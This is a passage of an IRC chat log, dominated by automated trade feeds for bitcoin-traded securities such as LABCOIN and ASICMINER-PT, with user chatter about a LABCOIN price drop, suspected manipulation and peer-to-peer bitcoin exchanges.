@ 0.002514 = 12.57 BTC [-] Sep 14 04:33:14 labpocalipse? Sep 14 04:33:17 [BTCTC] [LABCOIN] 500 @ 0.002514 = 1.257 BTC [-] Sep 14 04:33:18 [BTCTC] [LABCOIN] 2230 @ 0.002512 = 5.6018 BTC [-] Sep 14 04:33:31 [BTCTC] [LABCOIN] 17770 @ 0.002512 = 44.6382 BTC [-] Sep 14 04:33:33 [BTCTC] [LABCOIN] 100 @ 0.002505 = 0.2505 BTC [-] Sep 14 04:33:34 [BTCTC] [LABCOIN] 25 @ 0.002503 = 0.0626 BTC [-] Sep 14 04:33:35 [BTCTC] [LABCOIN] 2476 @ 0.002502 = 6.195 BTC [-] Sep 14 04:33:46 labcointanic to da ground Sep 14 04:33:46 someone is selling a lot. Not even first time in last few minutes. Sep 14 04:33:58 [BTCTC] [LABCOIN] 1000 @ 0.002502 = 2.502 BTC [-] Sep 14 04:34:13 [BTCTC] [LABCOIN] 106 @ 0.002502 = 0.2652 BTC [-] Sep 14 04:34:23 [BTCTC] [LABCOIN] 1418 @ 0.002502 = 3.5478 BTC [-] Sep 14 04:34:25 [BTCTC] [LABCOIN] 101 @ 0.002501 = 0.2526 BTC [-] Sep 14 04:34:25 [BTCTC] [LABCOIN] 1 @ 0.0025 BTC [-] Sep 14 04:34:26 everyone is selling a lot, for good reason Sep 14 04:34:26 [BTCTC] [LABCOIN] 280 @ 0.0025 = 0.7 BTC [-] Sep 14 04:34:27 [BTCTC] [LABCOIN] 1500 @ 0.0025 = 3.75 BTC [-] Sep 14 04:34:41 [BTCTC] [LABCOIN] 5220 @ 0.0025 = 13.05 BTC [-] Sep 14 04:34:43 [BTCTC] [LABCOIN] 200 @ 0.0025 = 0.5 BTC [-] Sep 14 04:34:44 [BTCTC] [LABCOIN] 100 @ 0.0025 = 0.25 BTC [-] Sep 14 04:34:45 [BTCTC] [LABCOIN] 1 @ 0.0025 BTC [-] Sep 14 04:34:47 [BTCTC] [LABCOIN] 3000 @ 0.0025 = 7.5 BTC [-] Sep 14 04:34:48 What is happen to company? Sep 14 04:34:52 [BTCTC] [LABCOIN] 1 @ 0.0025 BTC [-] Sep 14 04:35:02 [BTCTC] [BTC-GROWTH] 71 @ 0.099 = 7.029 BTC [+] Sep 14 04:35:05 [BTCTC] [ACTIVEMINING] 10 @ 0.002804 = 0.028 BTC [+] Sep 14 04:35:08 [HAVELOCK] [LABCO] 50 @ 0.00300377 = 0.1502 BTC [+] Sep 14 04:35:10 https://bitcointalk.org/index.php?topic=263445.8480 if you feel like sifting through hundreds of pages of bullshit Sep 14 04:35:10 [HAVELOCK] [LABCO] 330 @ 0.00300001 = 0.99 BTC [-] Sep 14 04:35:12 [HAVELOCK] [LABCO] 350 @ 0.003 = 1.05 BTC [-] Sep 14 04:35:17 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 14 04:35:22 cant ebelive that thread is 400 pages Sep 14 04:35:34 I hear in US bullshit is national sport. Sep 14 04:35:39 it'll be 500 by this time tomorrow Sep 14 04:35:56 [BTCTC] [LABCOIN] 1 @ 0.00249 BTC [-] Sep 14 04:36:17 [BTCTC] [LABCOIN] 29 @ 0.0024 = 0.0696 BTC [-] Sep 14 04:36:32 [BTCTC] [LABCOIN] 31 @ 0.0024 = 0.0744 BTC [-] Sep 14 04:36:33 [BTCTC] [LABCOIN] 100 @ 0.0024 = 0.24 BTC [-] Sep 14 04:36:35 [BTCTC] [LABCOIN] 50 @ 0.0024 = 0.12 BTC [-] Sep 14 04:36:36 [BTCTC] [LABCOIN] 214 @ 0.002302 = 0.4926 BTC [-] Sep 14 04:36:37 [BTCTC] [LABCOIN] 500 @ 0.002301 = 1.1505 BTC [-] Sep 14 04:36:39 [BTCTC] [LABCOIN] 100 @ 0.0023 = 0.23 BTC [-] Sep 14 04:36:39 [BTCTC] [LABCOIN] 1029 @ 0.0023 = 2.3667 BTC [-] Sep 14 04:36:40 [BTCTC] [LABCOIN] 3971 @ 0.0023 = 9.1333 BTC [-] Sep 14 04:36:42 [BTCTC] [LABCOIN] 592 @ 0.002289 = 1.3551 BTC [-] Sep 14 04:36:43 [BTCTC] [LABCOIN] 1202 @ 0.002288 = 2.7502 BTC [-] Sep 14 04:37:23 [BTCTC] [LABCOIN] 798 @ 0.002288 = 1.8258 BTC [-] Sep 14 04:37:25 [BTCTC] [LABCOIN] 300 @ 0.002271 = 0.6813 BTC [-] Sep 14 04:37:26 [BTCTC] [ACTIVEMINING] 103 @ 0.002803 = 0.2887 BTC [-] Sep 14 04:37:28 [BTCTC] [LABCOIN] 700 @ 0.00227 = 1.589 BTC [-] Sep 14 04:37:30 [BTCTC] [ACTIVEMINING] 800 @ 0.0028 = 2.24 BTC [-] Sep 14 04:37:31 [BTCTC] [ACTIVEMINING] 233 @ 0.00279 = 0.6501 BTC [-] Sep 14 04:37:58 [BTCTC] [LABCOIN] 300 @ 0.00227 = 0.681 BTC [-] Sep 14 04:37:59 [BTCTC] [LABCOIN] 2461 @ 0.002264 = 5.5717 BTC [-] Sep 14 04:38:43 [BTCTC] [LABCOIN] 1000 @ 0.00228 = 2.28 BTC [+] Sep 14 04:38:52 [BTCTC] [LABCOIN] 507 @ 0.00228 = 1.156 BTC [+] Sep 14 04:39:27 [BTCTC] [TAT.VIRTUALMINE] 44 @ 0.0006498 = 0.0286 BTC [-] Sep 14 04:39:36 https://twitter.com/Huth/status/378306063520374784/photo/1 Sep 14 04:39:39 Twitter / Huth: Fox news attempts to explain ... Sep 14 04:39:44 [BTCTC] [LABCOIN] 26 @ 0.00228 = 0.0593 BTC [+] Sep 14 04:39:47 [BTCTC] [LABCOIN] 1000 @ 0.002281 = 2.281 BTC [+] Sep 14 04:39:49 [BTCTC] [LABCOIN] 1580 @ 0.00228 = 3.6024 BTC [-] Sep 14 04:40:19 [BTCTC] [ACTIVEMINING] 103 @ 0.002793 = 0.2877 BTC [+] Sep 14 04:40:21 [BTCTC] [ACTIVEMINING] 1397 @ 0.00279 = 3.8976 BTC [-] Sep 14 04:40:29 yea and the am thread is much older Sep 14 04:41:07 [BTCTC] [LABCOIN] 5 @ 0.002498 = 0.0125 BTC [+] Sep 14 04:41:08 [BTCTC] [LABCOIN] 600 @ 0.002498 = 1.4988 BTC [+] Sep 14 04:41:09 [BTCTC] [LABCOIN] 1478 @ 0.002499 = 3.6935 BTC [+] Sep 14 04:41:10 [BTCTC] [LABCOIN] 878 @ 0.0025 = 2.195 BTC [+] Sep 14 04:42:08 iid like to evaluate p2p exchanges in the US. can people give me some names. Im trying to find one that has volume for large amounts (400btc or so) Sep 14 04:42:28 without %5 overhead Sep 14 04:42:36 [HAVELOCK] [LABCO] 50 @ 0.003 = 0.15 BTC [-] Sep 14 04:42:42 [BTCTC] [LABCOIN] 400 @ 0.002499 = 0.9996 BTC [-] Sep 14 04:42:43 yes Sep 14 04:42:46 but p2p Sep 14 04:42:54 [BTCTC] [LABCOIN] 122 @ 0.002585 = 0.3154 BTC [+] Sep 14 04:42:56 [BTCTC] [LABCOIN] 99 @ 0.002629 = 0.2603 BTC [+] Sep 14 04:42:57 [BTCTC] [LABCOIN] 98 @ 0.002648 = 0.2595 BTC [+] Sep 14 04:42:58 [BTCTC] [LABCOIN] 96 @ 0.002668 = 0.2561 BTC [+] Sep 14 04:42:59 well there is localbitcoins,that is one Sep 14 04:42:59 [BTCTC] [LABCOIN] 714 @ 0.002683 = 1.9157 BTC [+] Sep 14 04:43:00 [BTCTC] [LABCOIN] 95 @ 0.002688 = 0.2554 BTC [+] Sep 14 04:43:01 [BTCTC] [LABCOIN] 97 @ 0.002708 = 0.2627 BTC [+] Sep 14 04:43:03 gesell: I heard of kraken, buttercoin Sep 14 04:43:10 [BTCTC] [LABCOIN] 596 @ 0.002708 = 1.614 BTC [+] Sep 14 04:43:20 satoshi square Sep 14 04:43:37 id say that satoshi square more for Sep 14 04:43:43 kraken is EU only Sep 14 04:43:44 local is p2p Sep 14 04:43:49 kraken is no p2p Sep 14 04:43:51 [BTCTC] [LABCOIN] 95 @ 0.002748 = 0.2611 BTC [+] Sep 14 04:44:01 [BTCTC] [LABCOIN] 411 @ 0.002764 = 1.136 BTC [+] Sep 14 04:44:12 [BTCTC] [LABCOIN] 53 @ 0.002764 = 0.1465 BTC [+] Sep 14 04:44:13 and there is one that just ipoed on havelock Sep 14 04:44:13 [BTCTC] [LABCOIN] 99 @ 0.002764 = 0.2736 BTC [+] Sep 14 04:44:15 dealco or smth Sep 14 04:44:28 [BTCTC] [LABCOIN] 95 @ 0.002764 = 0.2626 BTC [+] Sep 14 04:45:05 I'm looking to sell 400+btc at market price in DC if anyone is interested Sep 14 04:45:06 [BTCTC] [LABCOIN] 380 @ 0.002948 = 1.1202 BTC [+] Sep 14 04:45:28 [BTCTC] [LABCOIN] 71 @ 0.002948 = 0.2093 BTC [+] Sep 14 04:45:31 In US I hear SEC is come down hard on "money transmitters" not licensed. Hard toes for p2p exchange. Sep 14 04:45:41 [BTCTC] [LABCOIN] 296 @ 0.002948 = 0.8726 BTC [+] Sep 14 04:45:43 [BTCTC] [LABCOIN] 100 @ 0.00295 = 0.295 BTC [+] Sep 14 04:45:51 [BTCTC] [LABCOIN] 155 @ 0.002948 = 0.4569 BTC [-] Sep 14 04:45:53 [BTCTC] [LABCOIN] 41 @ 0.002948 = 0.1209 BTC [-] Sep 14 04:46:02 satoshi square looks pretty dead Sep 14 04:46:07 [BTCTC] [LABCOIN] 100 @ 0.002948 = 0.2948 BTC [-] Sep 14 04:46:15 [BTCTC] [LABCOIN] 5 @ 0.002947 = 0.0147 BTC [-] Sep 14 04:46:16 [BTCTC] [LABCOIN] 25 @ 0.002948 = 0.0737 BTC [+] Sep 14 04:46:19 [BTCTC] [LABCOIN] 3000 @ 0.002948 = 8.844 BTC [+] Sep 14 04:46:34 [BTCTC] [LABCOIN] 296 @ 0.002947 = 0.8723 BTC [-] Sep 14 04:46:42 [BTCTC] [LABCOIN] 104 @ 0.002947 = 0.3065 BTC [-] Sep 14 04:46:43 [BTCTC] [DMS.MINING] 70 @ 0.002645 = 0.1852 BTC [-] Sep 14 04:46:44 [BTCTC] [LABCOIN] 171 @ 0.002888 = 0.4938 BTC [-] Sep 14 04:46:48 [BTCTC] [LABCOIN] 95 @ 0.00295 = 0.2803 BTC [+] Sep 14 04:46:48 [BTCTC] [LABCOIN] 201 @ 0.002958 = 0.5946 BTC [+] Sep 14 04:46:56 I would try localbitcoins. Don't know anyone in DC. Think the deep bitcoin pockets are in Japan and on West coast US. Sep 14 04:47:09 [HAVELOCK] [AM100] 5 @ 0.02014 = 0.1007 BTC [-] Sep 14 04:47:26 cant a front end for buttercoin Sep 14 04:47:29 [BTCTC] [LABCOIN] 380 @ 0.00295 = 1.121 BTC [-] Sep 14 04:47:55 [BTCTC] [LABCOIN] 117 @ 0.00304 = 0.3557 BTC [+] Sep 14 04:47:56 [BTCTC] [LABCOIN] 117 @ 0.003035 = 0.3551 BTC [-] Sep 14 04:47:57 [BTCTC] [LABCOIN] 3000 @ 0.003049 = 9.147 BTC [+] Sep 14 04:48:11 [BTCTC] [LABCOIN] 117 @ 0.003049 = 0.3567 BTC [+] Sep 14 04:48:20 Edward__: the volume is so low for localbitcoins. Sep 14 04:48:21 [BTCTC] [LABCOIN] 97 @ 0.003065 = 0.2973 BTC [+] Sep 14 04:48:28 would take a long while to sell off 400btc Sep 14 04:49:06 Depends on where. In Osaka heard there was a 2k sale 2 weeks ago. Sep 14 04:49:38 bleh Sep 14 04:49:49 okay, so basically there is nothing with the volum Sep 14 04:50:03 [BTCTC] [LABCOIN] 59 @ 0.002965 = 0.1749 BTC [-] Sep 14 04:50:07 also kinda sucks you can sort by volume on localbitcoins.com Sep 14 04:50:17 (or sort by limits) Sep 14 04:50:22 [BTCTC] [LABCOIN] 2260 @ 0.003 = 6.78 BTC [+] Sep 14 04:51:12 Is true. 2k sale was freak. Normally take weeks to sell so much. Sep 14 04:52:41 [MPEX] [S.MPOE] 2181 @ 0.00090342 = 1.9704 BTC [+] Sep 14 04:53:27 Is S.MPOE 'Mutuum Sigillum' aka Mt Gox US? Sep 14 04:53:44 what? Sep 14 04:54:03 [BTCTC] [LABCOIN] 3 @ 0.00296 = 0.0089 BTC [-] Sep 14 04:54:03 [BTCTC] [LABCOIN] 2000 @ 0.002889 = 5.778 BTC [-] Sep 14 04:54:05 Sorry. Meant to ask, what company is S.MPOE? Sep 14 04:54:05 [BTCTC] [LABCOIN] 3829 @ 0.002888 = 11.0582 BTC [-] Sep 14 04:54:16 [BTCTC] [DMS.SELLING] 25 @ 0.009439 = 0.236 BTC [+] Sep 14 04:54:24 Edward__ http://mpex.co/?mpsic=S.MPOE Sep 14 04:54:26 lol Sep 14 04:54:36 Mutuum Sigillum LLC Sep 14 04:54:52 "we seized their bank accounts" the gov Sep 14 04:55:20 [BTCTC] [LABCOIN] 9 @ 0.002844 = 0.0256 BTC [-] Sep 14 04:55:22 [BTCTC] [LABCOIN] 9 @ 0.002822 = 0.0254 BTC [-] Sep 14 04:55:23 [BTCTC] [LABCOIN] 64 @ 0.002812 = 0.18 BTC [-] Sep 14 04:55:24 [BTCTC] [LABCOIN] 10 @ 0.002802 = 0.028 BTC [-] Sep 14 04:55:25 [BTCTC] [LABCOIN] 5 @ 0.002801 = 0.014 BTC [-] Sep 14 04:55:27 [BTCTC] [LABCOIN] 9 @ 0.002777 = 0.025 BTC [-] Sep 14 04:55:28 [BTCTC] [LABCOIN] 9 @ 0.002755 = 0.0248 BTC [-] Sep 14 04:55:29 [BTCTC] [LABCOIN] 9 @ 0.002733 = 0.0246 BTC [-] Sep 14 04:55:29 [BTCTC] [LABCOIN] 10 @ 0.002711 = 0.0271 BTC [-] Sep 14 04:55:30 [BTCTC] [LABCOIN] 30 @ 0.0027 = 0.081 BTC [-] Sep 14 04:55:31 [BTCTC] [LABCOIN] 596 @ 0.002694 = 1.6056 BTC [-] Sep 14 04:55:32 [BTCTC] [LABCOIN] 9 @ 0.002689 = 0.0242 BTC [-] Sep 14 04:55:33 [BTCTC] [LABCOIN] 97 @ 0.002688 = 0.2607 BTC [-] Sep 14 04:55:34 [BTCTC] [LABCOIN] 95 @ 0.002666 = 0.2533 BTC [-] Sep 14 04:55:36 [BTCTC] [LABCOIN] 97 @ 0.002645 = 0.2566 BTC [-] Sep 14 04:55:37 [BTCTC] [LABCOIN] 2 @ 0.002624 = 0.0052 BTC [-] Sep 14 04:56:20 [BTCTC] [DMS.PURCHASE] 24 @ 0.01196 = 0.287 BTC [-] Sep 14 04:56:26 Dear Labcoin: The beatings will continue until morale improves. Sep 14 04:57:01 [BTCTC] [ASICMINER-PT] 1 @ 2.16 BTC [-] Sep 14 04:57:03 [BTCTC] [ASICMINER-PT] 1 @ 2.16 BTC [-] Sep 14 04:57:04 [BTCTC] [ASICMINER-PT] 1 @ 2.155 BTC [-] Sep 14 04:57:04 hehe Sep 14 04:57:04 [BTCTC] [ASICMINER-PT] 1 @ 2.153 BTC [-] Sep 14 04:57:05 [BTCTC] [ASICMINER-PT] 2 @ 2.152 = 4.304 BTC [-] Sep 14 04:57:06 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [-] Sep 14 04:57:07 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [-] Sep 14 04:57:08 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [-] Sep 14 04:57:10 [BTCTC] [ASICMINER-PT] 2 @ 2.122 = 4.244 BTC [-] Sep 14 04:57:11 [BTCTC] [ASICMINER-PT] 1 @ 2.121 BTC [-] Sep 14 04:57:12 [BTCTC] [ASICMINER-PT] 2 @ 2.12 = 4.24 BTC [-] Sep 14 04:57:13 [BTCTC] [ASICMINER-PT] 1 @ 2.118 BTC [-] Sep 14 04:57:14 [BTCTC] [ASICMINER-PT] 4 @ 2.112 = 8.448 BTC [-] Sep 14 04:57:14 [BTCTC] [ASICMINER-PT] 1 @ 2.111 BTC [-] Sep 14 04:57:16 [BTCTC] [ASICMINER-PT] 10 @ 2.111 = 21.11 BTC [-] Sep 14 04:57:17 [BTCTC] [ASICMINER-PT] 4 @ 2.111 = 8.444 BTC [-] Sep 14 04:57:18 [BTCTC] [ASICMINER-PT] 1 @ 2.11 BTC [-] Sep 14 04:57:19 [BTCTC] [ASICMINER-PT] 1 @ 2.103 BTC [-] Sep 14 04:57:20 [BTCTC] [ASICMINER-PT] 1 @ 2.103 BTC [-] Sep 14 04:57:21 [BTCTC] [ASICMINER-PT] 3 @ 2.102 = 6.306 BTC [-] Sep 14 04:57:27 didn't see that coming Sep 14 04:57:51 [BTCTC] [ASICMINER-PT] 1 @ 2.122 BTC [+] Sep 14 04:57:54 [BTCTC] [ASICMINER-PT] 1 @ 2.111 BTC [-] Sep 14 04:58:19 [BTCTC] [ASICMINER-PT] 8 @ 2.102 = 16.816 BTC [-] Sep 14 04:58:20 [BTCTC] [ASICMINER-PT] 5 @ 2.101 = 10.505 BTC [-] Sep 14 04:58:21 [BTCTC] [ASICMINER-PT] 4 @ 2.1 = 8.4 BTC [-] Sep 14 04:58:23 [BTCTC] [ASICMINER-PT] 2 @ 2.1 = 4.2 BTC [-] Sep 14 04:58:24 [BTCTC] [ASICMINER-PT] 6 @ 2.1 = 12.6 BTC [-] Sep 14 04:58:25 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] Sep 14 04:58:26 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] Sep 14 04:58:28 [BTCTC] [ASICMINER-PT] 4 @ 2.1 = 8.4 BTC [-] Sep 14 04:58:39 ^ x_x Sep 14 04:59:09 [HAVELOCK] [AM1] 1 @ 2.14 BTC [-] Sep 14 04:59:12 [HAVELOCK] [AM1] 1 @ 2.1 BTC [-] Sep 14 04:59:29 [BTCTC] [LABCOIN] 5 @ 0.002677 = 0.0134 BTC [+] Sep 14 04:59:30 [BTCTC] [LABCOIN] 49 @ 0.002675 = 0.1311 BTC [-] Sep 14 04:59:31 [BTCTC] [LABCOIN] 9 @ 0.002667 = 0.024 BTC [-] Sep 14 04:59:32 [BTCTC] [LABCOIN] 9 @ 0.002646 = 0.0238 BTC [-] Sep 14 04:59:33 [BTCTC] [LABCOIN] 495 @ 0.002629 = 1.3014 BTC [-] Sep 14 04:59:34 [BTCTC] [LABCOIN] 10 @ 0.002625 = 0.0263 BTC [-] Sep 14 04:59:35 [BTCTC] [LABCOIN] 9 @ 0.002604 = 0.0234 BTC [-] Sep 14 04:59:36 [BTCTC] [LABCOIN] 96 @ 0.002603 = 0.2499 BTC [-] Sep 14 04:59:37 [BTCTC] [LABCOIN] 9 @ 0.002583 = 0.0232 BTC [-] Sep 14 04:59:38 [BTCTC] [LABCOIN] 96 @ 0.002582 = 0.2479 BTC [-] Sep 14 04:59:39 [BTCTC] [LABCOIN] 9 @ 0.002562 = 0.0231 BTC [-] Sep 14 04:59:40 [BTCTC] [LABCOIN] 99 @ 0.002561 = 0.2535 BTC [-] Sep 14 04:59:41 [BTCTC] [LABCOIN] 9 @ 0.002541 = 0.0229 BTC [-] Sep 14 04:59:42 [BTCTC] [LABCOIN] 95 @ 0.00254 = 0.2413 BTC [-] Sep 14 04:59:43 [BTCTC] [LABCOIN] 9 @ 0.00252 = 0.0227 BTC [-] Sep 14 04:59:44 [BTCTC] [LABCOIN] 95 @ 0.002519 = 0.2393 BTC [-] Sep 14 04:59:45 [BTCTC] [LABCOIN] 3 @ 0.002511 = 0.0075 BTC [-] Sep 14 04:59:46 [BTCTC] [LABCOIN] 894 @ 0.002509 = 2.243 BTC [-] Sep 14 04:59:54 sell all the things! Sep 14 04:59:55 suspicious Sep 14 04:59:56 9 Sep 14 04:59:56 9 Sep 14 04:59:57 9 Sep 14 04:59:58 Labcoin CEO gambling on just-dice under nick 'balotelli' Sep 14 05:00:13 dear ser, whoever you are Sep 14 05:00:20 please continue Sep 14 05:00:28 that's true Sep 14 05:00:30 wha? Sep 14 05:01:23 looks like someone sells many smallish amounts of labcoin Sep 14 05:01:28 [BTCTC] [LABCOIN] 49 @ 0.002606 = 0.1277 BTC [+] Sep 14 05:01:31 i assume to push it lower Sep 14 05:02:16 [BTCTC] [LABCOIN] 200 @ 0.002615 = 0.523 BTC [+] Sep 14 05:02:27 same could be said for the last buy Sep 14 05:02:29 [BTCTC] [LABCOIN] 184 @ 0.002615 = 0.4812 BTC [+] Sep 14 05:02:31 i don't think it's over yet Sep 14 05:02:43 [BTCTC] [LABCOIN] 16 @ 0.002615 = 0.0418 BTC [+] Sep 14 05:02:44 [BTCTC] [LABCOIN] 9 @ 0.00258 = 0.0232 BTC [-] Sep 14 05:02:46 [BTCTC] [LABCOIN] 384 @ 0.002563 = 0.9842 BTC [-] Sep 14 05:02:46 [BTCTC] [LABCOIN] 9 @ 0.00256 = 0.023 BTC [-] Sep 14 05:02:47 [BTCTC] [LABCOIN] 96 @ 0.002559 = 0.2457 BTC [-] Sep 14 05:02:57 [BTCTC] [LABCOIN] 384 @ 0.002552 = 0.98 BTC [-] Sep 14 05:03:07 [BTCTC] [LABCOIN] 384 @ 0.002552 = 0.98 BTC [-] Sep 14 05:03:18 well, maybe he's just playing and not manipulating, so to say, but the order amounts are strange Sep 14 05:03:21 [BTCTC] [LABCOIN] 384 @ 0.002552 = 0.98 BTC [-] Sep 14 05:03:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.02042 BTC [-] Sep 14 05:03:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.0204 BTC [-] Sep 14 05:03:25 [BTCTC] [LABCOIN] 200 @ 0.002552 = 0.5104 BTC [-] Sep 14 05:03:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.0204 = 0.204 BTC [-] Sep 14 05:03:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.02037 BTC [-] Sep 14 05:03:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.02025 BTC [-] Sep 14 05:03:28 [BTCTC] [TAT.ASICMINER] 31 @ 0.02025 = 0.6278 BTC [-] Sep 14 05:03:29 9, 96, 9, 96, 99 ... etc. Sep 14 05:03:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0202 BTC [-] Sep 14 05:03:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.0202 BTC [-] Sep 14 05:03:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.02015 BTC [-] Sep 14 05:03:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.02013 = 0.2013 BTC [-] Sep 14 05:03:34 [BTCTC] [TAT.ASICMINER] 6 @ 0.02012 = 0.1207 BTC [-] Sep 14 05:03:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.02011 = 0.0402 BTC [-] Sep 14 05:03:36 [BTCTC] [LABCOIN] 10 @ 0.002552 = 0.0255 BTC [-] Sep 14 05:03:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.02011 = 0.0603 BTC [-] Sep 14 05:03:37 [BTCTC] [LABCOIN] 200 @ 0.002552 = 0.5104 BTC [-] Sep 14 05:03:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0201 BTC [-] Sep 14 05:03:43 [BTCTC] [LABCOIN] 200 @ 0.002552 = 0.5104 BTC [-] Sep 14 05:03:45 [BTCTC] [LABCOIN] 130 @ 0.002552 = 0.3318 BTC [-] Sep 14 05:03:56 [BTCTC] [LABCOIN] 4 @ 0.002552 = 0.0102 BTC [-] Sep 14 05:03:59 [BTCTC] [LABCOIN] 820 @ 0.002552 = 2.0926 BTC [-] Sep 14 05:04:11 [BTCTC] [LABCOIN] 130 @ 0.002553 = 0.3319 BTC [+] Sep 14 05:04:13 or it could be the buyer who placed strange bids ;) Sep 14 05:04:14 [BTCTC] [LABCOIN] 180 @ 0.002552 = 0.4594 BTC [-] Sep 14 05:04:15 [BTCTC] [LABCOIN] 79 @ 0.002552 = 0.2016 BTC [-] Sep 14 05:04:52 [BTCTC] [LABCOIN] 883 @ 0.00256 = 2.2605 BTC [+] Sep 14 05:05:09 [BTCTC] [DMS.SELLING] 1 @ 0.00944 BTC [+] Sep 14 05:05:32 [BTCTC] [DMS.SELLING] 1 @ 0.009599 BTC [+] Sep 14 05:07:56 [HAVELOCK] [CBTC] 8862 @ 0.00040999 = 3.6333 BTC [-] Sep 14 05:07:58 [HAVELOCK] [CBTC] 11000 @ 0.00041 = 4.51 BTC [+] Sep 14 05:10:30 [BTCTC] [LABCOIN] 5 @ 0.002809 = 0.014 BTC [+] Sep 14 05:10:31 [BTCTC] [LABCOIN] 30 @ 0.002825 = 0.0848 BTC [+] Sep 14 05:10:56 [BTCTC] [LABCOIN] 550 @ 0.002888 = 1.5884 BTC [+] Sep 14 05:11:04 the cat, it is bouncing Sep 14 05:11:47 [BTCTC] [LABCOIN] 652 @ 0.002865 = 1.868 BTC [-] Sep 14 05:11:48 [BTCTC] [LABCOIN] 96 @ 0.002899 = 0.2783 BTC [+] Sep 14 05:11:49 [BTCTC] [LABCOIN] 99 @ 0.002921 = 0.2892 BTC [+] Sep 14 05:11:51 [BTCTC] [LABCOIN] 98 @ 0.002943 = 0.2884 BTC [+] Sep 14 05:11:52 [BTCTC] [LABCOIN] 70 @ 0.002962 = 0.2073 BTC [+] Sep 14 05:11:53 [BTCTC] [LABCOIN] 97 @ 0.002965 = 0.2876 BTC [+] Sep 14 05:11:54 [BTCTC] [LABCOIN] 3408 @ 0.002985 = 10.1729 BTC [+] Sep 14 05:12:01 [BTCTC] [LABCOIN] 77 @ 0.002985 = 0.2298 BTC [+] Sep 14 05:12:47 [BTCTC] [ACTIVEMINING] 10 @ 0.002896 = 0.029 BTC [+] Sep 14 05:12:48 [BTCTC] [ACTIVEMINING] 10 @ 0.002897 = 0.029 BTC [+] Sep 14 05:12:49 [BTCTC] [ACTIVEMINING] 25 @ 0.002919 = 0.073 BTC [+] Sep 14 05:12:51 [BTCTC] [ACTIVEMINING] 25 @ 0.00292 = 0.073 BTC [+] Sep 14 05:12:52 [BTCTC] [ACTIVEMINING] 495 @ 0.002944 = 1.4573 BTC [+] Sep 14 05:12:53 [BTCTC] [ACTIVEMINING] 495 @ 0.002946 = 1.4583 BTC [+] Sep 14 05:12:54 [BTCTC] [ACTIVEMINING] 1470 @ 0.002949 = 4.335 BTC [+] Sep 14 05:12:55 [BTCTC] [ACTIVEMINING] 1 @ 0.00295 BTC [+] Sep 14 05:12:56 [BTCTC] [ACTIVEMINING] 1600 @ 0.00295 = 4.72 BTC [+] Sep 14 05:13:27 [BTCTC] [LABCOIN] 496 @ 0.002978 = 1.4771 BTC [-] Sep 14 05:13:28 [BTCTC] [LABCOIN] 883 @ 0.00298 = 2.6313 BTC [+] Sep 14 05:13:29 [BTCTC] [LABCOIN] 97 @ 0.002986 = 0.2896 BTC [+] Sep 14 05:13:31 [BTCTC] [LABCOIN] 500 @ 0.002999 = 1.4995 BTC [+] Sep 14 05:13:32 [BTCTC] [LABCOIN] 1000 @ 0.002999 = 2.999 BTC [+] Sep 14 05:13:33 [BTCTC] [LABCOIN] 3348 @ 0.003 = 10.044 BTC [+] Sep 14 05:13:42 it's not a cat, but a grasshoper (i hope :) Sep 14 05:14:12 [BTCTC] [LABCOIN] 3200 @ 0.00299 = 9.568 BTC [-] Sep 14 05:14:55 [HAVELOCK] [CBTC] 138 @ 0.00041 = 0.0566 BTC [+] Sep 14 05:15:20 [BTCTC] [LABCOIN] 89 @ 0.002852 = 0.2538 BTC [-] Sep 14 05:15:22 [BTCTC] [LABCOIN] 72 @ 0.002851 = 0.2053 BTC [-] Sep 14 05:15:23 [BTCTC] [LABCOIN] 729 @ 0.00285 = 2.0777 BTC [-] Sep 14 05:15:25 [BTCTC] [LABCOIN] 303 @ 0.002784 = 0.8436 BTC [-] Sep 14 05:15:25 [BTCTC] [LABCOIN] 8 @ 0.002783 = 0.0223 BTC [-] Sep 14 05:15:27 [BTCTC] [LABCOIN] 160 @ 0.002984 = 0.4774 BTC [+] Sep 14 05:15:29 man these clowns are just amazing Sep 14 05:15:30 AMAZING COMPANY! Sep 14 05:15:38 thanks assbot Sep 14 05:15:46 high five Sep 14 05:16:00 labcoin CEO gambling investors funds on JD Sep 14 05:16:03 [BTCTC] [LABCOIN] 72 @ 0.002983 = 0.2148 BTC [-] Sep 14 05:16:04 [BTCTC] [LABCOIN] 253 @ 0.002984 = 0.755 BTC [+] Sep 14 05:16:05 [BTCTC] [LABCOIN] 500 @ 0.002986 = 1.493 BTC [+] Sep 14 05:16:07 [BTCTC] [LABCOIN] 3269 @ 0.00299 = 9.7743 BTC [+] Sep 14 05:16:08 [BTCTC] [LABCOIN] 500 @ 0.002999 = 1.4995 BTC [+] Sep 14 05:16:09 [BTCTC] [LABCOIN] 392 @ 0.003 = 1.176 BTC [+] Sep 14 05:16:10 [BTCTC] [LABCOIN] 5000 @ 0.003 = 15 BTC [+] Sep 14 05:16:11 [BTCTC] [LABCOIN] 390 @ 0.003 = 1.17 BTC [+] Sep 14 05:16:12 [BTCTC] [LABCOIN] 97 @ 0.003009 = 0.2919 BTC [+] Sep 14 05:16:12 [BTCTC] [LABCOIN] 96 @ 0.003031 = 0.291 BTC [+] Sep 14 05:16:13 [BTCTC] [LABCOIN] 97 @ 0.003054 = 0.2962 BTC [+] Sep 14 05:16:14 [BTCTC] [LABCOIN] 100 @ 0.003054 = 0.3054 BTC [+] Sep 14 05:16:15 [BTCTC] [LABCOIN] 500 @ 0.003074 = 1.537 BTC [+] Sep 14 05:16:16 [BTCTC] [LABCOIN] 4000 @ 0.003075 = 12.3 BTC [+] Sep 14 05:16:17 [BTCTC] [LABCOIN] 3700 @ 0.003076 = 11.3812 BTC [+] Sep 14 05:16:18 [BTCTC] [LABCOIN] 99 